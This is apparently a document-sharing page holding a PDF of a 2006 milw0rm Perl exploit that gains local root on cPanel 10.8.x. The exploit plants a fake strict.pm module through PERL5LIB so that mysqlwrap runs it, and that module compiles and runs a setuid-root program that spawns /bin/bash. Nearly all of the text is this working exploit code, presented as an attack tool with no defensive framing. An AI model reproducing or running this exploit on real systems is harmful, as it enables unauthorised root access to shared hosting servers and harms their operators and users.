cPanel 10.8.x cpwrap via mysqladmin Local Root Exploit.pdf

Loading ...

Global Do...

News & Politics

5

0

Try Now Log In Pricing

1 #!/usr/bin/perl −w
2
3 # 10/01/06 − cPanel <= 10.8.x cpwrap root exploit via mysqladmin
4 # use strict; # haha oh wait..
5
6 my $cpwrap       = "/usr/local/cpanel/bin/cpwrap";
7 my $mysqlwrap    = "/usr/local/cpanel/bin/mysqlwrap";
8 my $pwd          = ‘pwd‘;
9
10 chomp $pwd;
11 $ENV{’PERL5LIB’} = "$pwd";
12
13 if ( ! −x "/usr/bin/gcc" )  { die "gcc: $!\n"; }
14 if ( ! −x "$cpwrap" )       { die "$cpwrap: $!\n"; }
15 if ( ! −x "$mysqlwrap" )    { die "$mysqlwrap: $!\n"; }
16
17 open  (CPWRAP, "<$cpwrap") or die "Could not open $cpwrap: $!\n";
18 while(<CPWRAP>) {
19    if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
20 }
21 close (CPWRAP);
22
23 open  (STRICT, ">strict.pm") or die "Can’t open strict.pm: $!\n";
24 print  STRICT  "\$e  = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
25 print  STRICT  "system(\"/bin/echo −n \\\"\$e\\\">Maildir.c\");\n";
26 print  STRICT  "system(\"/usr/bin/gcc Maildir.c −o Maildir\");\n";
27 print  STRICT  "system(\"/bin/chmod 4755 Maildir\");\n";
28 print  STRICT  "system(\"/bin/rm −f Maildir.c strict.pm\");\n";
29 close (STRICT);
30
31 system("$mysqlwrap DUMPMYSQL 2>/dev/null");
32
33 if ( −e "Maildir" ) {
34    system("./Maildir");
35 }
36 else {
37    unlink "strict.pm";
38    die "Failed\n";
39 }
40
41 # milw0rm.com [2006−10−01]
Page 1/1
cPanel 10.8.x cpwrap via mysqladmin Local Root Exploit
Clint Torrez
10/01/2006